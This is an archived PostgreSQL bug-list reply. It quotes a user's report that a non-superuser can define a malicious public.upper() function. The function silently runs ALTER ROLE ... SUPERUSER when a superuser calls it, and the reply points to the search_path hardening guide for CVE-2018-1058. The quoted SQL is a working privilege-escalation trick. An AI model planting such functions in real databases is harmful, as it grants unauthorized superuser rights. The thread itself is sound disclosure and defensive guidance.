| From: | Heikki Linnakangas <hlinnaka(at)iki(dot)fi> |
|---|---|
| To: | abcxiaod(at)126(dot)com, pgsql-bugs(at)lists(dot)postgresql(dot)org, PG Bug reporting form <noreply(at)postgresql(dot)org> |
| Subject: | Re: BUG #16448: Remote code execution vulnerability |
| Date: | 2020-05-18 09:49:51 |
| Message-ID: | 8adfb8f8-91f0-1dd5-15c0-12cdba61b191@iki.fi |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-bugs |
On 18/05/2020 12:14, PG Bug reporting form wrote:
> The following bug has been logged on the website:
>
> Bug reference: 16448
> Logged by: yi Ding
> Email address: abcxiaod(at)126(dot)com
> PostgreSQL version: 10.12
> Operating system: linux
> Description:
>
> A common user created a function in the public space and added some
> malicious codes in the function, when other users with superuser rights call
> this function, the malicious code will be executed , so as to achieve the
> purpose of remote malicious code execution.
>
> First, Non-superuser lh defines a function named upper, which contains
> the statement to modify user permissions.
> SQL:
> CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
> CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
> ALTER ROLE lh SUPERUSER;
> SELECT pg_catalog.upper($1);
> $$ LANGUAGE SQL VOLATILE;
>
> Second, Superuser pg01 will execute the above statement after calling the
> upper function, whice will change user lh to a super user.
See
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path
- Heikki
| From | Date | Subject | |
|---|---|---|---|
| Next Message | David G. Johnston | 2020-05-18 14:22:56 | Re: BUG #16448: Remote code execution vulnerability |
| Previous Message | Magnus Hagander | 2020-05-18 09:47:39 | Re: BUG #16450: Recovery.conf file shows clear text password. |